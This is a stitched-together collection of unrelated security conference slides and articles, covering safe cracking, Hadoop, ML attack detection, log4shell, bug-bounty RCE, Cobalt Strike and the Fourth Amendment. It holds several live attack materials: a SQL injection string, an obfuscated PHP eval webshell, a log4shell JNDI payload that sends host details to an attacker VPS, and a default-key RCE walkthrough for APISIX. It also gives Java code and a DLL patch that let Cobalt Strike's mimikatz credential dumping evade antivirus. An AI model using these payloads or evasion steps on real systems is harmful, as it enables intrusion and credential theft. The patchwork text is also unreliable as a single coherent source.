Motor with 8400
tick encoder
Servo with
feedback
Arduino
Handle puller
Magnets
Erector set
(Actobotics)
Power!
Motor with 8400
tick encoder
Servo with
feedback
Arduino
Handle puller
Magnets
Erector set
(Actobotics)
Credit: Pololu
Power!
Motor with 8400
tick encoder
Servo with
feedback
Arduino
Handle puller
Magnets
Erector set
(Actobotics)
The super freaking amazing
nautilus gear that made this all
work
‘Come back here’
spring
Standard servo with analog
feedback hack
Very fancy string
Go! Btn
Servo and
feedback
Motor Driver
Beep!
Current Sensor
Motor control
and feedback
Display
RedBoard =
Arduino
12V External
Hard Drive
Power Supply
‘Home’ Photogate
Problem Domain:
100³ combinations
10 seconds per test
115 days (worst case)
Exploits
Combinations:
100³ combinations
33³ combinations = 4.15 days
Disc C has 12 indents
33² * 12 = 1.5 days
Exploits
Disc C:
Outer diameter: 2.815” (71.5mm)
Width of solution slot: 0.239”
Width of 11 indents: 0.249” +/- 0.002”
8.84” (Circumference) / 8400 ticks
0.001” / tick
~10 ticks smaller
Exploits
Combinations:
1003 combinations
333 combinations = 4.15 days
Disc C has 12 indents
332 * 12 = 1.5 days
Disc C has a skinny indent
332 * 1 = 3 hours
X
Exploits
‘New’ Disc C:
Outer diameter: 2.456” (62.4mm)
Width of solution slot: 0.250”
Width of 11 indents: 0.201” +/- 0.002”
7.72” (Circumference) / 8400 ticks
0.00092” / tick
~54 ticks LARGER
(5 times easier to hack)
‘New’ Disc C:
Outer diameter: 2.456” (62.4mm)
Width of solution slot: 0.250”
Width of 11 indents: 0.201” +/- 0.002”
7.72” (Circumference) / 8400 ticks
0.00092” / tick
~54 ticks LARGER
(5 times easier to hack)
‘New’ Disc C:
Outer diameter: 2.456” (62.4mm)
Width of solution slot: 0.250”
Width of 11 indents: 0.201” +/- 0.002”
7.72” (Circumference) / 8400 ticks
0.00092” / tick
~54 ticks LARGER
(5 times easier to hack)
‘New’ Disc C:
Outer diameter: 2.456” (62.4mm)
Width of solution slot: 0.250”
Width of 11 indents: 0.201” +/- 0.002”
7.72” (Circumference) / 8400 ticks
0.00092” / tick
~54 ticks LARGER
(5 times easier to hack)
Exploits
Combinations:
100³ combinations
33³ combinations = 4.15 days
Disc C has 12 indents
33² * 12 = 1.5 days
Disc C has a large indent
33² * 1 = 3 hours
Exploits Luck
Test Time:
Resetting Dials = 10s / test
‘Set testing’ = 4s / test
1.2 hours
45 minutes!
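The arithmetic on these slides checks out; a quick sanity check (assuming 10 s per full-reset test and 4 s per "set test"):
day, hour = 86400, 3600
print(100**3 * 10 / day)      # naive brute force: ~115.7 days
print(33**3 * 10 / day)       # +/-1 dialing tolerance: ~4.2 days
print(33**2 * 12 * 10 / day)  # 12 indents on disc C: ~1.5 days
print(33**2 * 10 / hour)      # one distinguishable indent: ~3.0 hours
print(33**2 * 4 / hour)       # set testing at 4 s/test: ~1.2 hours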
How do I protect
myself!?
Credit: Pixabay.com
Credit: starwarsblog.starwars.com
One of these is not like the others...
“The S&G 6730 ... has only a +/- .5 dialing
tolerance, essentially giving a 1 digit window to
hit. While many locksmiths might prefer the S&G
6730, it can be notoriously difficult to open and
very unforgiving to human error. In addition, slight
alterations to the lock (for example, if the dial or
the dial ring was bumped during shipping) can
shift the combination, rendering the lock
unusable.”
-Hayman Safes: Lock Ratings
Future Research
Future Research
Future Research
Credit: iRobot
Future Research
Is it open yet?
[email protected]
Demo fail! | pdf |
Cloud Security in Map/Reduce
An Analysis
July 31, 2009
Jason Schlesinger
[email protected]
Presentation Overview
Contents:
1. Define Cloud Computing
2. Introduce and Describe Map/Reduce
3. Introduce Hadoop
4. Introduce Security Issues with Hadoop
5. Discuss Possible Solutions and Workarounds
6. Final Thoughts
Goals:
Raise awareness of Hadoop and its potential
Raise awareness of existing security issues in
Hadoop
Inspire present and future Hadoop users and
administrators to be aware of security in their
Hadoop installation
Defining Cloud Computing
Distributed across multiple machines that are linked
together either through the Internet, or across an internal
network
Fault tolerant to hardware failure, which is inevitable to
happen in a large cluster scenario
Applications are abstracted from the OS (more or less)
Often used to offload tasks from user systems that would be
unreasonable to run, or unfavorable to maintain.
Considering the above:
Hadoop is an incarnation of Map/Reduce in a Cloud
environment.
Map/Reduce: What It Is
Map/Reduce is for huge data sets that have to
be indexed, categorized, sorted, culled, analyzed,
etc. It can take a very long time to look through
each record or file in a serial
environment. Map/Reduce allows data to be
distributed across a large cluster, and can
distribute out tasks across the data set to work on
pieces of it independently, and in parallel. This
allows big data to be processed in relatively little
time.
Funfact: Google implemented and uses a proprietary
Map/Reduce platform. Apache has produced
an open source Map/Reduce platform called Hadoop
Laundromat analogy of Map/Reduce
Imagine that your data is laundry. You wash this laundry
by similar colors. Then you dry this laundry by similar
material (denims, towels, panties, etc.)
Serial
Operation:
You now have clean laundry!
(Time Elapsed: 2-3 hrs)
Laundromat analogy of Map/Reduce
Map/Reduce operation:
You now have clean laundry!
(Time elapsed: 1.25 hrs.)
Word Count example of Map/Reduce
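The original slide is a diagram; as a plain-text stand-in, here is a minimal word-count sketch of the two phases (ordinary Python, no Hadoop required):
from collections import defaultdict

def map_phase(document):
    # Map: emit a (word, 1) pair for every word in the input split.
    return [(word, 1) for word in document.split()]

def reduce_phase(pairs):
    # Shuffle/Reduce: group pairs by key and sum the counts.
    counts = defaultdict(int)
    for word, n in pairs:
        counts[word] += n
    return dict(counts)

pairs = map_phase("the quick brown fox jumps over the lazy dog the end")
print(reduce_phase(pairs))  # {'the': 3, 'quick': 1, ...}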
Other Potential uses of Map/Reduce
Since it takes a large data set, breaks it down into smaller data
sets, here are some potential uses:
indexing large data sets in a database
image recognition in large images
processing geographic information system (GIS) data -
combining vector data w/ point data (Kerr, 2009)
analyzing unstructured data
analyzing stock data
Machine learning tasks
Any situation where processing a data set would be impractical
due to its size.
Map/Reduce is a little more confusing...
Source: (Dean & Ghemawat, 2004)
Hadoop - A Brief Overview
Developed by Apache as an open source distributed
Map/Reduce platform, based off of Google's MapReduce as
described in Dean and Ghemawat, 2004.
Runs on a Java architecture
Hadoop allows businesses to process large amounts of data
quickly by distributing the work across several nodes.
One of the leaders of open source implementations of
Map/Reduce.
Good for very large data sets and on large clusters.
Growing as a business and research tool
Hadoop - A Key Business Tool
Used by Large Content-Distribution Companies, such as...
Yahoo! - Recently released their version of Hadoop
Hadoop is used for many of their tasks, and over 25,000
computers are running Hadoop. (PoweredBy, 2009)
A9
Hadoop is good for Amazon, they have lots of product data,
as well as user-generated content to index, and make
searchable. (PoweredBy, 2009)
New York Times
Hadoop is used to perform large-scale image conversions of
public domain articles. (Gottfrid, 2007)
Veoh
Hadoop is used to "reduce usage data for internal metrics, for
search indexing and for recommendation data." (PoweredBy,
2009)
Hadoop - Why I Care (and so can you!)
Used by non-content-distribution companies, such as
Facebook
eHarmony
Rackspace ISP
Other early adopters include anyone with big data:
medical records
tax records
network traffic
large quantities of data
Wherever there is a lot of data, a Hadoop cluster can generally
process it relatively quickly.
Security Framework and Access Control
Now that we know that Hadoop is increasingly useful, here are
the security issues with it:
Hadoop holds data in HDFS - Hadoop Distributed File
System. The file system as of version 0.19.1 has no read
control, all jobs are run as 'hadoop' user, and the file system
doesn't follow access control lists.
The client identifies the user running a job by the output of
the 'whoami' command - which can be forged (Kerr, 2009); see the sketch after this list
HBase (BigTable for Hadoop) as of ver. 0.19.3 lacks critical
access control measures. No read or write control.
The LAMP analogue, any application can access any
database by simply making a request for it.
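To make the whoami point concrete, the identity lookup amounts to roughly this (a simplified illustration, not the actual Hadoop source; the class here is mine):
import java.io.BufferedReader;
import java.io.InputStreamReader;

class WhoAmITrust {
    // Roughly what a 0.19-era client does to decide who you are:
    static String currentUser() throws Exception {
        Process p = Runtime.getRuntime().exec("whoami");
        try (BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()))) {
            return r.readLine(); // whatever binary named "whoami" is first on PATH answers
        }
    }
}
Any user who puts their own whoami earlier on PATH controls the identity the cluster sees.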
Implications of this Accusation
Any business running a Hadoop cluster gives all
programmers and users the same level of trust to all the
data that goes into the cluster.
Any job running on a Hadoop cluster can access any data
on that cluster.
Any user with limited access to the jobs they can run, can
potentially run that job on any data set on the cluster.
Pause for Demonstration
(Or similar substitute.)
Possible Workarounds
Keep each data set on its own Hadoop Cluster
If attackers can only access data they have rights to,
then the point is moot
It is possible to run each job in its own cluster on
Amazon Web Services with the Elastic MapReduce
service, which sits on the Elastic Cloud Computing
platform. Simply upload your data to Amazon, give it a
job, tell it how many nodes to use, and run it.
Hadoop on Demand - load data into a real cluster, and
generate a virtual cluster every time a job is run.
Possible Workarounds
Don't store any confidential, secret, private data in Hadoop
No one cares if the group that's indexing the forum data
can access the knowledge base data (actually, we wish
they would more often)
Encrypt all your sensitive data
This will make it difficult to analyze sensitive fields
Sensitive data is not always defined as such, and may
leak into unstructured fields (such as comments sections)
Adds overhead of moving data that most jobs won't read.
Possible Solution
Develop a Solution that sits on the file system, or write a
concerned email to Hadoop developers
The problem is that access control is held at the client
level, when it should be at the file system level.
Access control list checks should be performed at the
start of any read or write.
User authentication should use a more secure method,
such as a password or RSA key authentication.
Final Thoughts
Hadoop is a rising technology, not quite mature, and still has
plenty of its own issues. However, it's starting to take hold in
the marketplace, and now is the time to quell bigger issues like
this.
We have the power to shape the future today, let us learn from
the mistakes of the past.
Bibliography
Dean, J., & Ghemawat, S. (2004). MapReduce: Simplified Data Processing on Large Clusters. Google, Inc.
Gottfrid, D. (2007). Self Service, Prorated, Super Computing Fun. Retrieved June 29, 2009, from http://open.blogs.nytimes.com/2007/11/01/self-service-prorated-super-computing-fun/
Hadoop 0.19.1 API (2009). Hadoop Documentation. Apache Software Foundation. Retrieved March 10, 2009, from http://hadoop.apache.org/core/docs/r0.19.1/api/
Hadoop Map/Reduce Tutorial (2009). Apache Software Foundation. Retrieved March 10, 2009, from http://hadoop.apache.org/core/docs/r0.19.1/mapred_tutorial.html
PoweredBy (2009). Apache Software Foundation. Retrieved March 10, 2009, from http://wiki.apache.org/hadoop/PoweredBy
Kerr, N. (2009). http://nathankerr.com/
» What’s Next?
Hacks-In-Taiwan 2006 Keynote
Yen-Ming Chen
Senior Principal Consultant
Foundstone, A Division of McAfee
Agenda
» Introduction
» Security Ecosystem
» Security Trends
» Security Technology
» Conclusion
Introduction
Yen-Ming Chen
» Sr. Principal Consultant
» Been to 12 countries, 7 offices and 6 years with Foundstone
» Contributing author of four security books and numerous published articles
» Master of Science in Information Networking from C.M.U.
» Provide security risk assessment from web applications to emerging technologies
Security EcoSystem
[Diagram: the security ecosystem — Government, Corporate/Organization, General Public and The Bad Guys, with edges labeled Attack (×3), Sell Products (×2), Regulate and Catch]
A Chronology of Data Breaches Reported Since the ChoicePoint Incident (Feb. 2005)
Unfortunately I am one of the innocent victims too!
Security Trend – The Problem
Vulnerability-to-worm cycle is shrinking…
[Bar chart, days from vulnerability to worm: 1999 — 288; 2000 — 104; 2001 — 205; 2002 — 88; 2003 — 26]
The sophistication of attacks is rising…
Internet security has come a long way…
[Maturity curve: Internet Isolated → Internet Aware → Internet Enabled → Internet Centric → Internet Nirvana; way-stations include firewalls, antivirus, intrusion detection, vulnerability assessment, consolidated authorization, outsourcing grunt work, enterprise vulnerability management systems, application security, security resource dashboards and a risk management dashboard]
Gartner “Managing the Risks of IT Security” September 2002
• Internet “Darwinism” = Survival of the Fittest
• From Reactive to Proactive
• From Assessing to Managing
Security Technology
[Adoption-timeline chart, 1996 → 2006 → 20??: firewalls and VPN early (≈1996); IDS, vulnerability assessment, SSO and PKI next (≈1998); IPS and VM/risk management (≈2002); secure coding / secure architecture around today (2006); secure OS still ahead (20??)]
[Chart: Information Security Maturity, 2004 — maturity vs. time through Blissful Ignorance, an Awareness Phase, a Corrective Phase and an Operations Excellence Phase; activities along the curve: review status quo, (re-)establish the security team, develop a new policy set, design architecture, initiate a strategic program, institute processes, conclude catch-up projects, track technology and business change, continuous process improvement. NOTE: population distributions (5%–50% bands) represent typical, large G2000-type organizations]
http://www.acsac.org/2004/dist.html
Microsoft’s Software Security Enlightenment
Here is another perspective
Source: http://www.avertlabs.com/research/blog/?p=53
In fact, almost every security technology
depends on vulnerabilities…
Technology — Role in vulnerabilities?
Vulnerability Mgmt — Discovering and managing vulnerabilities
Patch/Systems Mgmt — Fixing vulnerabilities
Encryption — Hackers viewing vulnerable, cleartext files
Authentication/Authorization — Hackers taking advantage of vulnerable passwords, few controls
Identity Mgmt — Vulnerability inherent in online identities
Anti-virus — Vulnerabilities in software, end-user usage
Policy Management — Ensuring compliance to prevent attacks on vulnerabilities
NIDS/HIDS — Detecting hackers exploiting vulnerabilities
Event Correlation — Addressing the data overflow issue caused by vulnerabilities
NIPS/HIPS — Detecting and preventing hackers exploiting vulnerabilities
Firewalls/VPN — Blocking attackers taking advantage of vulnerabilities
Disruptive or Sustaining?
» Disruptive Innovation
– Introducing new dimensions of performance compared to existing innovations
– Creates new markets or offers more convenience or lower prices to customers
» Sustaining Innovation
– Introducing improved performance compared to existing products and services
Firewall as an Example
[Charts: sustaining innovation vs. low-end disruption vs. new-market disruption, performance over time — company improvement trajectories against customer demand trajectories; examples plotted include the firewall, firewall with different spec, firewall + VPN, IPS, software firewall(?), personal firewall and the personal Internet security suite, with nonconsumers at the new-market end]
What’s Next?
» Security Integration
– Make security a part of your business
– Make security a part of your daily operation
– Make security a part of your life
» Fundamental problems:
– Trust
– Balance
Security Integration
» Events happening in the industry:
– Corporate M&A
• 3Com/Cisco buying security companies
• Symantec + Veritas
• EMC + RSA
– Companies expanding into security
• Microsoft — SDL, Anti-Virus, integrating security into SMS and MOM
• Verizon, Nortel and other service providers and telecoms — starting to provide security consulting services
» Security-only companies in the long run?
– Attack competitors' credibility
– 0-days to keep the advantage
Security Integration – RPV Analysis
» Resource
– Non-security companies have resources in:
• Product development skills
• Cash
• Channels and customers
» Process
– Market research
– Resource allocation
» Value
– Provide security on top of an existing product
• Adds value for existing customers
• Easier to be accepted
Trust and Balance
» Abusing trust relationships
– Attackers are shifting between targets
• Network -> Server -> (Web) Application -> Browser
– Researchers are seeking solutions
• Firewall -> Vulnerability Scan -> Trusted Computing Platform -> SDL
» Balance
– Password policies that don't make business sense
– Unplug the network to keep it secure?!#$^
– Security testing should be part of the QA process
Conclusion
» Security will never die; but it won't be effective until fully integrated into business
– Don't expect a silver bullet or an "easy button," because there is none!
– Automation is a paradigm shift; a necessary evil; a hard problem too!
» Fundamental problems need to be solved
– 'Trust' and 'Balance'
» Expand your horizon
– You need to understand the technology, and innovation, to know where you are going next!
» Question & Answer
Thank You!
Yen-Ming Chen
[email protected]
Playing with Attack Detection — Using Machine Learning
ID: tang3
NSFOCUS
Shen Junli
WHOAMI
• ID: tang3
• Security researcher at NSFOCUS
• Web dog 🐶 — Java web, PHP code auditing, offensive & defensive techniques
• Machine-learning bystander
• Fitness enthusiast & student of it
• Badly addicted, badly skilled Go player
Purpose: sharing an approach
Ideas, lessons learned, practice
Common machine-learning problem families
• Prediction
• Classification
• Clustering
Machine learning is
the process of turning a real-world problem into a mathematical one and solving that.
Thinking steps
• Figure out which family of problem you are solving
• Regexes first, machine learning second (quantity → quality)
Without samples at a serious order of magnitude, don't even start.
Thinking steps
• Figure out which family of problem you are solving — classification
• Regexes first, machine learning second (quantity → quality)
• How do the features become numbers? (data preprocessing)
Data preprocessing — turning the data's content into something computable.
Thinking steps
• Figure out which family of problem you are solving — classification
• Regexes first, machine learning second (quantity → quality)
• How do the features become numbers? (data preprocessing)
• Pick the best-suited algorithm
• Once early results look good, refine the algorithm further
Machine learning is no panacea; there are scenarios it fits and scenarios it doesn't.
Hands-on
Building an attack-detection engine
• A normal-vs-attack binary classification problem (logistic regression?)
• Attack statements are easy to collect in bulk, by attack type
• What are the features? How do they become numbers?
Thinking it through:
-1 and union select password from admin --+
Spam classifiers:
the Naive Bayes algorithm
(Naive Bayes, a.k.a. NB)
• A normal-vs-attack binary classification problem (logistic regression?)
• Attack statements are easy to collect in bulk, by attack type
• What are the features? How do they become numbers?
The relationships between words — statistics!
Thinking it through
• A normal-vs-attack binary classification problem (logistic regression?)
• Attack statements are easy to collect in bulk, by attack type
• What are the features? How do they become numbers?
• Algorithm: Naive Bayes
Thinking it through
• Let D be the whole text, h+/h− stand for attack and non-attack, and W1 be the first word of D
• P(h+|D) = P(h+) · P(D|h+) / P(D)
• P(h−|D) = P(h−) · P(D|h−) / P(D)
• Compare P(h+|D) against P(h−|D)
Deriving the formula
• Naive Bayes simplifies the computation:
P(D|h+) = P(W1|h+) · P(W2|h+) · P(W3|h+) · …
P(D|h−) = P(W1|h−) · P(W2|h−) · P(W3|h−) · …
Applying the formula
• -1 union select 1,123,2 --+
• p(-1 union select 1,123,2 --+ | h+) = p(-1|h+) · p(union|h+) · p(select|h+) · p(1|h+) · …
Using statistics
• The law of large numbers
• Out of 1,000 attack-related word occurrences, union shows up 10 times, so P(union) = 0.01
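A toy sketch of that scoring step (my own illustration — class and field names are not the engine's): word probabilities are the counted frequencies above, and the two class scores are compared in log space to avoid underflow:
import java.util.HashMap;
import java.util.Map;

public class NaiveBayesScorer {
    // P(w|class), estimated offline from counted word frequencies per corpus
    private final Map<String, Double> pAttack = new HashMap<>();
    private final Map<String, Double> pNormal = new HashMap<>();
    private double priorAttack = 0.5, priorNormal = 0.5;
    private static final double SMOOTH = 1e-6; // floor for unseen words

    boolean isAttack(String[] tokens) {
        double a = Math.log(priorAttack), n = Math.log(priorNormal);
        for (String t : tokens) {
            a += Math.log(pAttack.getOrDefault(t, SMOOTH));
            n += Math.log(pNormal.getOrDefault(t, SMOOTH));
        }
        return a > n; // compare P(h+|D) vs P(h-|D); P(D) cancels out
    }
}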
Data preprocessing —
one tokenizer per attack type?
A single tokenizer performs well — but ten of them?
One tokenizer per attack class — how much work is that?
Data preprocessing — a generic tokenizer
• Attack statements all carry code-like features, so tokenization can be abstracted over those code traits (feasible)
• It keeps the performance cost from growing linearly with the number of attack types (worth it)
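As one illustration of tokenizing on code-like features (the pattern below is my own guess at such rules, not the engine's actual tokenizer):
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class GenericTokenizer {
    // one pattern covering identifiers/keywords, numbers, quoted strings and operator characters
    private static final Pattern TOKEN =
        Pattern.compile("[A-Za-z_$@][A-Za-z0-9_$]*|\\d+|'[^']*'|\"[^\"]*\"|[(){}\\[\\],;=<>!+*/%|&^~-]");

    static List<String> tokenize(String payload) {
        List<String> out = new ArrayList<>();
        Matcher m = TOKEN.matcher(payload);
        while (m.find()) out.add(m.group().toLowerCase());
        return out;
    }

    public static void main(String[] args) {
        System.out.println(tokenize("-1 union select password from admin --+"));
    }
}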
Once built, how is it different
from regex detection?
Models are built without writing a single code rule.
Updating the rules just means adding new corpus samples to the rule base.
Detection runs more than ten times faster than the regex engine.
Cross-validation of the algorithm: 6% false positives, 0.66% misses.
Xi Xing's numbers come from K-fold evaluation;
the other engines' numbers come from Chaitin's slides.
[Bar chart: miss rate and false-positive rate (0–80%) compared across Xi Xing (吸星), SQLChop, Vendor A, Vendor B, Vendor C and libinjection]
Advertisement
The attack-detection engine we built is called Xi Xing (吸星)
Star Track
http://startra.nsfocus.com
Misses and false positives can be reported to:
[email protected]
Some problems
Probability is beyond your control — which is also what makes it fair.
If the generic tokenizer ever changes:
pull one hair and the whole body moves.
Every attack (language?) has a temperament of its own.
WTF
@eval//kjkjkjk
($_GET//
[//kjkjkj
'c'//kjkioewuorwuo
]//kjlsjlkjljlkj
);
@eval($_GET['c']);
Some conjectures
• Word statistics + some other classifier (logistic regression)?
• Could this approach work for log auditing, or even code auditing?
The road is blocked and long —
"Long is the way and far the journey; I will seek high and low."
log4shell notes
0x00 Background
The log4shell (Log4j2 JNDI lookup) vulnerability needs no introduction; anyway, these are working notes on detection, mitigation and the bypasses.
0x01 Detection
1. Perimeter and host-side controls — WAF, RASP, HIDS, SOC telemetry — can all surface exploitation attempts.
2. RASP in particular hooks the lookup/JNDI call paths inside the JVM, so it observes the log4j behavior directly.
0x02 Mitigations
1. Set nolookups to true.
2. Set the corresponding environment-variable key.
3. Note that upgrading the JDK alone does not reliably prevent RCE.
(1) nolookups
Setting nolookups to true disables message lookups outright. Lookups are a legitimate log4j2 feature, usable in the XML configuration as well as inside logged messages. For example,
log.error("${sys:java.version}"+"xxxxx")
triggers a lookup, so the actual Java version is written into the log instead of the literal text. The full set of lookup implementations can be browsed in the log4j2 source on GitHub.
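The same behavior in runnable form (an illustrative harness; with a vulnerable log4j2 below 2.15.0 on the classpath, any attacker-influenced logged string behaves the same way):
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LookupDemo {
    private static final Logger log = LogManager.getLogger(LookupDemo.class);
    public static void main(String[] args) {
        // The ${sys:...} lookup is resolved inside the message at logging time,
        // which is exactly the mechanism ${jndi:...} abuses.
        log.error("${sys:java.version}" + "xxxxx");
    }
}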
(2) Three ways to set it:
1. JVM flag: -Dlog4j2.formatMsgNoLookups=true
2. A log4j2.component.properties file on the classpath containing log4j2.formatMsgNoLookups=True
3. The environment variable FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS set to true
Two caveats: 1. these switches only exist from log4j2 2.10 onward; 2. the environment-variable key may also appear as LOG4J_log4j2_formatMsgNoLookups=True.
(3) Upgrading the JDK
Newer JDKs restrict remote-codebase loading over JNDI, but dnslog-style probing still works, and the JDK restriction can be bypassed with local deserialization gadgets (a Spring Boot environment is a typical example):
https://mp.weixin.qq.com/s/vAE89A5wKrc-YnvTr0qaNg
0x03 Incomplete fixes and bypasses
The first-round patch tried to neuter lookups, but its rc1 handling could still be bypassed. In short:
1. rc1 was bypassed and rc2 followed; nolookups now defaults to true;
2. the JNDI path is effectively disabled unless switched back on;
3. lookup processing itself is restricted.
The blunt, reliable mitigation is deleting the JndiLookup class from log4j2 entirely: then no lookup can ever reach JNDI, even with nolookups=false.
0x04 Verification
${jndi:dns://xxx.xxx.xxx.xxx:port/${hostName} -${sys:user.dir}- ${sys:java.version} - ${java:os}}
Point the payload at a VPS you control and listen for the UDP (DNS) callback.
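On the VPS, anything that prints inbound UDP will do — e.g. this minimal sketch (the port is an assumption; match whatever the dns:// payload targets):
import java.net.DatagramPacket;
import java.net.DatagramSocket;

public class UdpCatcher {
    public static void main(String[] args) throws Exception {
        try (DatagramSocket s = new DatagramSocket(53)) { // listen where the payload points
            byte[] buf = new byte[1500];
            while (true) {
                DatagramPacket p = new DatagramPacket(buf, buf.length);
                s.receive(p); // any hit means the lookup fired on the target
                System.out.println(p.getAddress() + " -> " + new String(p.getData(), 0, p.getLength()));
            }
        }
    }
}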
A callback carrying the resolved hostname, working directory, Java version and OS marks the host as exposed to the RCE.
0x01 Preface
Friends interested in technical exchange, or in penetration testing / code auditing / SRC bug-hunting / red-team training, or in red-vs-blue assessments, security product development and security services, are welcome to reach me at QQ/VX 547006660.
https://github.com/J0o1ey/BountyHunterInChina
The "Reborn as a Bounty Hunter in China" series — a star is appreciated.
0x02 How it started
Idly scrolling WeChat groups one morning, I happened to notice a newly launched SRC (vendor response center).
A freshly launched SRC is usually untouched goods — nobody has been over it yet, so scoring is that much easier. Let's take a look.
0x03 From asset recon to a changed default key — a dead end
I did a quick round of internet-wide asset discovery keyed on the target's certificate information
and found that many of the target's domains use "dash-separated" naming. Big companies commonly name things this way to tell development, test and production environments apart.
To summarize, the words that commonly appear in development, test and production domain names are:
随后从资产列表中找到了⼀个看起来像管理api接⼝的域名进⾏访问
根据⻚⾯回显,结合之前多年的测试经验,推断此处使⽤了Apache Apisix
之前复现过Apache Apisix默认秘钥添加恶意路由导致的RCE漏洞,此处直接准备⼀试
发现直接寄了,⽬标⽣产环境的api把这个默认的key给改掉了,导致没法创建恶意路由
uat
test
dev
pre
pr
pro
...
Was that the end of it? Obviously not our style.
0x04 Straightening out the approach — finding hidden test-environment assets
During recon we had already noticed the target's uniform domain-naming convention,
so we could fuzz domain names to strike some sparks and hunt for hidden assets.
In the end this surfaced four hidden non-production assets that follow the target's convention.
./ffuf -w domain_test -u https://gateway-xxx-xxx-FUZZ.xxx.com -mc 404 -t 1
0x05 From the test environment's default-key original sin to RCE
I then tried the default key against the four hidden subdomains, adding a malicious Lua route on each — and every one succeeded.
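For context, a quick way to test whether the shipped default admin key is still live (my own sketch; the host below is a placeholder, the X-API-KEY value is APISIX's publicly documented default):
import java.net.HttpURLConnection;
import java.net.URL;

public class ApisixKeyCheck {
    public static void main(String[] args) throws Exception {
        URL u = new URL("https://gateway-xxx-xxx-test.xxx.com/apisix/admin/routes");
        HttpURLConnection c = (HttpURLConnection) u.openConnection();
        c.setRequestProperty("X-API-KEY", "edd1c9f034335f136f87ad84b625c8f1"); // shipped default
        System.out.println("HTTP " + c.getResponseCode()); // 200 + a route list => default key accepted
    }
}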
With the malicious routes in place it was a straight run to the finish.
The target runs on k8s; at a guess, the test environments were built from old images still carrying the default key, operations never changed it, and that's the whole RCE in a nutshell.
After filing four command-execution findings, I rewarded myself with egg cheung fun and a sausage for dinner.
0x06 Takeaways
Use the target's domain-naming conventions to uncover hidden development and test environment assets,
and turn them into fresh breakthroughs.
As is well known, a number of Cobalt Strike's feature modules are implemented via the spawn method: a sacrificial process is started (rundll32.exe under the default profile) and the feature's DLL is reflectively injected into it. Under 360's core-crystal (核晶) mode this behavior is blocked. A recent t00ls article described patching the Cobalt Strike source to use inject instead of spawn to bypass core-crystal: injecting the built-in feature DLL into the current process means no new process is ever started. Building on that article, and with help from @wonderkun, this post arrives at a better modification.
Analyzing the feature modules
Common Cobalt Strike features such as logonpasswords and hashdump are implemented in the jar in beacon.TaskBeacon.class.
Taking logonpasswords as the example, the trail leads to the code below.
MimikatzSmall spawns according to the target system's bitness; following into MimikatzJobSmall, the DLL that finally gets reflectively injected is mimikatz-min.x64.dll or mimikatz-min.x86.dll.
public void LogonPasswords()
{
MimikatzSmall("sekurlsa::logonpasswords");
}
public void MimikatzSmall(String paramString)
{
for (int i = 0; i < this.bids.length; i++)
{
BeaconEntry localBeaconEntry = DataUtils.getBeacon(this.data, this.bids[i]);
if (localBeaconEntry.is64()) {
new MimikatzJobSmall(this, paramString).spawn(this.bids[i], "x64");
} else {
new MimikatzJobSmall(this, paramString).spawn(this.bids[i], "x86");
}
}
}
public class MimikatzJobSmall
extends MimikatzJob
{
public MimikatzJobSmall(TaskBeacon paramTaskBeacon, String paramString)
{
super(paramTaskBeacon, paramString);
}
public String getDLLName()
{
if (this.arch.equals("x64")) {
return "resources/mimikatz-min.x64.dll";
}
return "resources/mimikatz-min.x86.dll";
}
}
Modifying the Java
All that is needed is to change the spawn call to inject. The inject method implemented in the jar takes a pid; since we are injecting into the current process, we obtain the current process's pid through the helpers already present in the jar. Also note that localBeaconEntry.arch() in the code below returns the bitness of the current process, whereas localBeaconEntry.is64() in the original code returns the bitness of the operating system. Because we are using inject, an x64 DLL must go into an x64 process and an x86 DLL into an x86 process:
public void MimikatzSmall(String paramString)
{
for (int i = 0; i < this.bids.length; i++)
{
BeaconEntry localBeaconEntry = DataUtils.getBeacon(this.data, this.bids[i]);
int PID = CommonUtils.toNumber(localBeaconEntry.getPid(), 0);
if ("x64".equals(localBeaconEntry.arch())) {
new MimikatzJobSmall(this, paramString).inject(PID, "x64");
//new MimikatzJobSmall(this, paramString).spawn(this.bids[i], "x64");
} else {
new MimikatzJobSmall(this, paramString).inject(PID, "x86");
//new MimikatzJobSmall(this, paramString).spawn(this.bids[i], "x86");
}
}
}
DLL encryption and decryption
The DLLs inside Cobalt Strike are stored encrypted, so they must be decrypted before they can be modified. The details are not repeated here; see:
https://github.com/lovechoudoufu/cobaltstrike4.4_cdf#dll%E4%BF%AE%E6%94%B9
Modifying the DLL
Taking logonpasswords as the example again, the DLL that gets reflectively injected is mimikatz-min.x64.dll or mimikatz-min.x86.dll. Opening it in IDA shows that the DLL's core functionality runs in DllMain, and after the worker function returns it calls ExitProcess directly to terminate the process.
That is fine for the spawn method, because the freshly started rundll32.exe process is supposed to ExitProcess when the work is done. Once changed to inject, however, it becomes a problem: the DLL now runs inside the current beacon's address space, so finishing the work kills the beacon process. We could simply patch out the call to ExitProcess, but there are several call sites, and patching them one by one is tedious.
A better approach is to change ExitProcess into ExitThread. Since the DLL is started by the inject method, it runs on a new thread inside the current process; when that thread exits, the beacon's main thread is unaffected. Editing the import table with CFF Explorer is enough.
Reopening the DLL in IDA then shows the call resolving to ExitThread.
Testing
With the DLL and the Java both modified, simply swap them back into the jar and test against core-crystal.
Run mimikatz coffee directly: mimikatz and logonpasswords call two different DLLs — logonpasswords now uses the inject method, while mimikatz coffee is unmodified and still uses spawn. The unmodified one gets blocked, while the modified one executes successfully and returns output.
BUG
If the beacon lives in an x86 process while the target OS is x64, running logonpasswords injects the x86 DLL into that x86 process and fails with:
ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process
This is mainly a limitation of the bundled mimikatz DLL itself — msf's mimikatz has the same issue. Since the target OS is x64, the fix is simply to use an x64 process and inject the x64 DLL.
References
https://www.t00ls.cc/viewthread.php?tid=65597 | pdf |
They took my laptop!
The Fourth Amendment explained
Disclaimer
It is vitally important for you to
understand that while I am an
attorney, I am not your attorney.
In no way, shape, or form is this
presentation intended to provide you
with legal advice.
Before relying or acting upon any
information learned from this
presentation you should consult a
licensed attorney in your State.
Introduction
Overview
The Constitution
Intro to the Fourth
Suspicion Standards
Exceptions
They took my laptop!
Hypothetical applications
Modern case overviews
Question & Answer Period
The Constitution
Pop Quiz Hot Shots
The Constitution Quiz
Q: How many Articles does the
constitution contain?
A: 7 + Preamble, Signatures
The Constitution Quiz
Q: How many amendments are
there?
A: 27
The Constitution Quiz
Q: The first ten amendments are
called?
A: The bill of rights
The Constitution Quiz
